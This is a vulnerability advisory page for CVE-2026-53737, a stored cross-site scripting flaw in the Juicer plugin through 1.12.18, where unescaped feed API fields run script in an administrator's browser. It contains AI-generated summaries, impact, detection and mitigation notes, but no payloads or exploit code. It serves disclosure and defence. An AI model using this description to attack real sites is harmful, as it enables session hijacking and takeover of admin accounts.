CVE-2026-53737
Deferred Deferred - Pending Action

Cross-Site Scripting in Juicer Feed API Response

Vulnerability report for CVE-2026-53737, including description, CVSS score, EPSS score, affected products, exploitability, helpful resources, and attack-flow context.

Publication date: 2026-06-10

Last updated on: 2026-06-10

Assigner: VulnCheck

Description

Juicer through 1.12.18 fails to escape remote feed API response fields before rendering them on the admin settings page. Attackers controlling the connected feed data can inject script that executes in an administrator's browser when the settings page loads.

CVSS Scores

EPSS Scores

Probability:
Percentile:

Meta Information

Published
2026-06-10
Last Modified
2026-06-10
Generated
2026-07-01
AI Q&A
2026-06-11
EPSS Evaluated
2026-06-30
NVD
EUVD

Affected Vendors & Products

Showing 1 associated CPE
Vendor Product Version / Range
juicer juicer to 1.12.18 (inc)

Helpful Resources

Exploitability

CWE
CWE Icon
KEV
KEV Icon
CWE ID Description
CWE-79 The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.

Attack-Flow Graph

AI Quick Actions

Instant insights powered by AI
Executive Summary

The vulnerability in Juicer through version 1.12.18 occurs because the software fails to properly escape remote feed API response fields before displaying them on the admin settings page.

This means that if an attacker controls the data coming from the connected feed, they can inject malicious scripts that will execute in the browser of an administrator when they load the settings page.

Impact Analysis

This vulnerability can lead to cross-site scripting (XSS) attacks, where malicious scripts run in the context of an administrator's browser.

Such attacks can result in unauthorized actions performed with the administrator's privileges, theft of sensitive information, session hijacking, or other malicious activities.

Compliance Impact

The vulnerability is a stored Cross-Site Scripting (XSS) issue that allows attackers to inject malicious scripts into the admin settings page of the Juicer plugin. This could potentially lead to unauthorized access or manipulation of administrative functions.

While the provided information does not explicitly mention compliance with standards such as GDPR or HIPAA, vulnerabilities like stored XSS can pose risks to data integrity and confidentiality, which are critical aspects of these regulations.

Organizations using the affected Juicer plugin should consider the risk of this vulnerability in their compliance assessments, as exploitation could lead to unauthorized actions or data exposure that might violate regulatory requirements.

Detection Guidance

This vulnerability is a stored Cross-Site Scripting (XSS) issue that occurs when malicious scripts are injected via remote feed API response fields and executed in the administrator's browser on the Juicer admin settings page.

Detection involves verifying if the Juicer plugin version is 1.12.18 or earlier and checking the admin settings page for unescaped or suspicious script content coming from connected feeds.

Since this is a web application vulnerability affecting the admin interface, network-level detection commands are limited. However, you can perform the following checks:

  • Check the Juicer plugin version installed on your WordPress site to confirm if it is vulnerable.
  • Use a web browser's developer tools or security testing tools (like Burp Suite or OWASP ZAP) to inspect the admin settings page for any injected scripts or unusual content in the feed data.
  • Monitor HTTP traffic to the admin settings page for suspicious payloads or script tags in the API response fields.

No specific command-line commands are provided in the available resources for direct detection on the network or system.

Mitigation Strategies

To mitigate this stored XSS vulnerability in Juicer versions up to 1.12.18, immediate steps include:

  • Update the Juicer plugin to a version later than 1.12.18 where the vulnerability is fixed.
  • Limit administrative access to the Juicer settings page to trusted users only, reducing the risk of malicious script execution.
  • Avoid connecting to untrusted or unknown social media feeds that could inject malicious scripts.
  • Regularly review and sanitize any feed data or inputs that are rendered on the admin settings page.

Applying these steps will reduce the risk of exploitation until an official patch or update is applied.

Chat Assistant

Ask questions about this CVE
Hi! I’m here to help you understand CVE-2026-53737. Ask me anything about the vulnerability, its impact, or mitigation strategies.
0/70

EPSS Chart